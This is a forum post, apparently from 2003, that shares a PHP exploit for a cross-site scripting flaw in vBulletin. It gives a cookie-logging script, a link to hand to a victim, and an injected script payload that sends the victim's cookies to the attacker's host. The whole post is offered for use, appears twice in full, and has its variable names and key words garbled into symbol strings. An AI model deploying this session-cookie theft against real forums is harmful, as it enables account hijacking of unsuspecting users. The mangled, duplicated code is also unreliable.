HackeRMaN
19-05-2003, 11:00
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's &@#&@#&@#&@#&@#&@#s and storing it into a
log file.
// Variables:
= "&@#&@#&@#&@#&@#&@#s.Log";
// Functions:
/*
If (['Action'] = "Log") {
= "<!--";
= "--->";
}
Else {
= "";
= "";
}
Print ();
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ();
*/
Switch (['Action']) {
Case "Log":
= ['&@#&@#&@#&@#&@#&@#'];
= StrStr (, SubStr (, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
= FOpen (, "a+");
FWrite (, Trim () . "\n");
FClose ();
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\"
&@#&@#&@#&@#&@#&@#&@#=\"0; URL=" . ['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists () || !In_Array ()) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
= Array_UniQue (File ());
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("^ Logged Records : <B>" . Count (File
()) . "</B>\n");
Print ("^ Listed Records : <B>" . Count
() . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ()) > 0) {
['Download'] = "[<A Href=\"" .
. "\">Download</A>]";
}
Else{
['Download'] = "[No Records in Log]";
}
Print ("^ Download Log : " .
['Download'] . "\n");
Print ("^ Clear Records : [<A Href=\"" .
. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ([0], [1]) = Each ()) {
Print ("<B>" . [0] . ": </B>" . [1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ();
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"3; URL=" .
['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&&@#&@#&@#&@#&@#&@#='+
(document.&@#&@#&@#&@#&@#&@#);</Script>
- Then go to Http://[Exploit Path]?Action=List
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's &@#&@#&@#&@#&@#&@#s and storing it into a
log file.
// Variables:
= "&@#&@#&@#&@#&@#&@#s.Log";
// Functions:
/*
If (['Action'] = "Log") {
= "<!--";
= "--->";
}
Else {
= "";
= "";
}
Print ();
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ();
*/
Switch (['Action']) {
Case "Log":
= ['&@#&@#&@#&@#&@#&@#'];
= StrStr (, SubStr (, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
= FOpen (, "a+");
FWrite (, Trim () . "\n");
FClose ();
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\"
&@#&@#&@#&@#&@#&@#&@#=\"0; URL=" . ['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists () || !In_Array ()) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
= Array_UniQue (File ());
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("^ Logged Records : <B>" . Count (File
()) . "</B>\n");
Print ("^ Listed Records : <B>" . Count
() . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ()) > 0) {
['Download'] = "[<A Href=\"" .
. "\">Download</A>]";
}
Else{
['Download'] = "[No Records in Log]";
}
Print ("^ Download Log : " .
['Download'] . "\n");
Print ("^ Clear Records : [<A Href=\"" .
. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ([0], [1]) = Each ()) {
Print ("<B>" . [0] . ": </B>" . [1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ();
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("&@#&@#&@#&@#&@#&@# HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"3; URL=" .
['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&&@#&@#&@#&@#&@#&@#='+
(document.&@#&@#&@#&@#&@#&@#);</Script>
- Then go to Http://[Exploit Path]?Action=List